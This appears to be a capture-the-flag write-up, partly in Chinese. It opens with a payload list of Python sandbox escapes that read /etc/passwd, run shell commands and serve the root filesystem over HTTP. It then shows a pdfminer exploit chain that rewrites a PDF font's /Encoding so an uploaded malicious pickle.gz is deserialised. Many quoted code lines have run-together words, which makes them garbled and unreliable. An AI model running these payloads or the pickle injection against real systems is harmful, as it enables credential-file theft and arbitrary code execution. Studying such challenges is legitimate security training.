# python3 print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') exit() sum(xrange(-999999999,99999999)) file('/etc/passwd').read() open('/etc/passwd').read() __import__['fileinput'].input('/etc/passwd') __import__['os'].system('cat /etc/passwd') __import__['os'].popen('/etc/passwd', 'r').read() __import__['os'].system('cd /; python -m SimpleHTTPServer') print(file('/etc/passwd').read()) print(open('/etc/passwd').read()) print(__import__['fileinput'].input('/etc/passwd')) print(__import__['os'].system('cat /etc/passwd')) print(__import__['os'].popen('/etc/passwd', 'r').read()) print(__import__['os'].system('cd /; python -m SimpleHTTPServer')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999)) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
随便选一条即可。
pdf2text
一个 PDF-to-text 转换器能有什么危害呢?
What kind of flaw could a PDF-to-text converter possibly have?
Hint 1
Search "pickle.loads" in pdfminer package and try to reach it
def pdf_to_text(pdf_path, txt_path): with open(txt_path, 'w', encoding='utf-8') as txt: for page_layout in extract_pages(pdf_path): for element in page_layout: if isinstance(element, LTTextContainer): txt.write(element.get_text()) txt.write('\n')
defget_font(self, objid: object, spec: Mapping[str, object]) -> PDFFont: if objid and objid in self._cached_fonts: font = self._cached_fonts[objid] else: log.debug("get_font: create: objid=%r, spec=%r", objid, spec) if settings.STRICT: if spec["Type"] isnot LITERAL_FONT: raise PDFFontError("Type is not /Font") # Create a Font object. if"Subtype"in spec: subtype = literal_name(spec["Subtype"]) else: if settings.STRICT: raise PDFFontError("Font Subtype is not specified.") subtype = "Type1" if subtype in ("Type1", "MMType1"): # Type1 Font font = PDFType1Font(self, spec) elif subtype == "TrueType": # TrueType Font font = PDFTrueTypeFont(self, spec) elif subtype == "Type3": # Type3 Font font = PDFType3Font(self, spec) elif subtype in ("CIDFontType0", "CIDFontType2"): # CID Font font = PDFCIDFont(self, spec) elif subtype == "Type0": # Type0 Font dfonts = list_value(spec["DescendantFonts"]) assert dfonts subspec = dict_value(dfonts[0]).copy() for k in ("Encoding", "ToUnicode"): if k in spec: subspec[k] = resolve1(spec[k]) font = self.get_font(None, subspec) else: if settings.STRICT: raise PDFFontError("Invalid Font spec: %r" % spec) font = PDFType1Font(self, spec) # this is so wrong! if objid and self.caching: self._cached_fonts[objid] = font return font
只有符合elif subtype in ("CIDFontType0", "CIDFontType2"):才能够进入下一步的调用,可以去了解一下CID Font,大致就是这种字体将字符排列并且排列的次序号就是各个字符的CID,而CMap文件保存了字符编码与字符CID的映射关系。所以我们需要一个嵌入CID字体的pdf。再往后分析,get_cmap()会根据编码的方式去读取***.pickle.gz文件来获取cmap文件。
def_load_data(cls, name: str) -> Any: name = name.replace("\0", "") filename = "%s.pickle.gz" % name log.debug("loading: %r", name) cmap_paths = ( os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"), os.path.join(os.path.dirname(__file__), "cmap"), ) for directory in cmap_paths: path = os.path.join(directory, filename) if os.path.exists(path): gzfile = gzip.open(path) try: returntype(str(name), (), pickle.loads(gzfile.read())) finally: gzfile.close() raise CMapDB.CMapNotFound(name)
for obj in pdf.objects: ifisinstance(obj, pikepdf.Dictionary): if obj.get("/Type") == "/Font"and obj.get("/Subtype") == "/Type0": if obj.get("/Encoding") == pikepdf.Name("/Identity-H"): obj["/Encoding"] = pikepdf.Name("//app/uploads/hacker")
if flag & FEXTRA: # Read & discard the extra field, if present extra_len, = struct.unpack("<H", self._read_exact(2)) self._read_exact(extra_len) if flag & FNAME: # Read and discard a null-terminated string containing the filename whileTrue: s = self._fp.read(1) ifnot s or s==b'\000': break if flag & FCOMMENT: # Read and discard a null-terminated string containing a comment whileTrue: s = self._fp.read(1) ifnot s or s==b'\000': break if flag & FHCRC: self._read_exact(2) # Read & discard the 16-bit header CRC returnTrue